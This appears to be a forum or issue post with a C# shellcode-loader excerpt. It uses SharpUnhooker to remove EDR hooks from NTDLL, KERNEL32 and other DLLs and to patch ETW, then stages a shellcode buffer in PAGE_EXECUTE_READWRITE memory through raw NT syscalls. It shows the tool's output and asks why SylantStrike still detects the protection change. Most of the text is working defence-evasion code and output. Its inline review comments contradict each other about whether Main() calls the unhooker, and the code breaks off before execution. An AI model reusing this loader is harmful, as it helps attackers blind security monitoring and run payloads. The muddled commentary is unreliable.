public class SUUsageExample{
.....
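/// <summary>
/// Entry point of the usage example: builds the shellcode buffer and hands it
/// to <see cref="run"/>, which performs the unhooking pass and the in-process
/// allocate / copy / re-protect sequence.
/// </summary>
public static void Main()
{
    // Shellcode payload; the bytes are elided in this excerpt (the original
    // post describes it as "just message box").
    byte[] buf = new byte[285] { 0xfc,0x48,0x81,0xe4,0xf0,0....... }; // just message box

    // run() invokes SharpUnhooker.Mein() itself, so it is deliberately NOT
    // called here as well: calling it in both places makes the whole
    // unhook + ETW-patch sequence execute twice per process (the banner
    // appears twice in the captured output).
    run(buf);
}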
/// <summary>
/// Runs the SharpUnhooker pass, then allocates memory in the current process,
/// copies <paramref name="ShellcodeBytes"/> into it and changes the region's
/// protection to 0x40. NOTE(review): the method body continues past the end of
/// this excerpt (no closing brace is visible), so whatever executes the buffer
/// afterwards — if anything — is not shown here.
/// </summary>
/// <param name="ShellcodeBytes">Raw bytes to copy into the freshly allocated region.</param>
public static void run(byte[] ShellcodeBytes)
{
// NOTE(review): Main() also calls Mein() before invoking run(), so the whole
// unhook / ETW-patch sequence runs twice per process (see the duplicated
// banner in the captured output). One of the two calls is redundant.
SharpUnhooker.Mein();
IntPtr ProcessHandle = new IntPtr(-1); // pseudo-handle for current process
// Region size is passed by ref to both syscalls below; the kernel may write an
// adjusted (page-rounded) size back into it — TODO confirm, not visible here.
IntPtr ShellcodeBytesLength = new IntPtr(ShellcodeBytes.Length);
// Zero base address: the system chooses where the region is placed and writes
// the chosen base back through the ref parameter.
IntPtr AllocationAddress = new IntPtr();
IntPtr ZeroBitsThatZero = IntPtr.Zero;
UInt32 AllocationTypeUsed = (UInt32)AllocationType.Commit | (UInt32)AllocationType.Reserve;
Console.WriteLine("[*] Allocating memory...");
// The NTSTATUS returned here is discarded: a failed allocation leaves
// AllocationAddress at zero and the Marshal.Copy below would then fault.
// 0x04 is the raw protection constant (PAGE_READWRITE on Win32).
NtAllocateVirtualMemory(ProcessHandle, ref AllocationAddress, ZeroBitsThatZero, ref ShellcodeBytesLength, AllocationTypeUsed, 0x04);
Console.WriteLine("[*] Copying Shellcode...");
// Copies the full managed array into the native region (uses the array's
// length, not the possibly-adjusted ShellcodeBytesLength).
Marshal.Copy(ShellcodeBytes, 0, AllocationAddress, ShellcodeBytes.Length);
Console.WriteLine("[*] Changing memory protection setting...");
// Receives the region's previous protection from NtProtectVirtualMemory.
UInt32 newProtect = 0;
// Purpose of the one-second pause is not stated; presumably a delay before
// the protection change — confirm with the author.
Sleep(1000);
Console.WriteLine("[*] ...");
// 0x40 is the raw PAGE_EXECUTE_READWRITE constant. The NTSTATUS is ignored, so
// a blocked or failed transition (which is what SylantStrike reports) is not
// detected by this code; "[*] Passed..." is printed unconditionally and does
// not prove the region is now executable. In the captured output this line
// is the last one to execute before the process stops.
NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);
Console.WriteLine("[*] Passed...");
When SylantStrike is injected into the process started from the code above, it still detects the following call into NTDLL — even though SharpUnhooker reports NTDLL as unhooked — namely the request to change the allocation to 0x40 (PAGE_EXECUTE_READWRITE): `NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);`. Note that the captured output below stops at `[*] ...` and never prints `[*] Passed...`, and that the code does not check the NTSTATUS returned by NtAllocateVirtualMemory or NtProtectVirtualMemory, so a failed or blocked call would not be reported by the program itself.
ShellAnuuked.exe
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[ Written By GetRektBoy724 ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]
[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[ Written By GetRektBoy724 ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]
[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[*] Allocating memory...
[*] Copying Shellcode...
[*] Changing memory protection setting...
[*] ...
SylantStrikeInject.exe --dll=SylantStrike.dll --process=ShellAnuuked.exe
Waiting for process events
+ Listening for the following processes: shellanuuked.exe
Injecting process ShellAnuuked.exe(10520) with DLL SylantStrike.dll